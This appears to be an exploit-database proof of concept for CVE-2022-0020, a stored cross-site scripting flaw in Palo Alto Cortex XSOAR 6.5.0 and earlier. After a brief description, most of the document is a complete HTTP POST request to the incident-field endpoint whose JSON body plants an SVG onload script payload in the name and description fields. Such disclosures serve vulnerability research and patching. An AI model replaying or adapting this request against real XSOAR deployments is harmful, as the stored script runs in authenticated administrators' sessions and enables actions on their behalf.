Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting

# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: omurugur# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020# Version: 6.5.0 - 6.2.0 - 6.1.0# Tested on: [relevant os]# CVE : CVE-2022-0020# Author Web: https://www.justsecnow.com# Author Social: @omurugurrrA stored cross-site scripting (XSS) vulnerability in Palo Alto NetworkCortex XSOAR web interface enables an authenticated network-based attackerto store a persistent javascript payload that will perform arbitraryactions in the Cortex XSOAR web interface on behalf of authenticatedadministrators who encounter the payload during normal operations.POST /acc_UAB(MAY)/incidentfield HTTP/1.1Host: x.x.x.xCookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;isTimLicense=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)Gecko/20100101 Firefox/94.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://x.x.x.x/acc_UAB(MAY)Content-Type: application/jsonX-Xsrf-Token:Api_truncate_results: trueOrigin: https://x.x.x.xContent-Length: 373Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Fieldedited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}Regards,Omur UGUR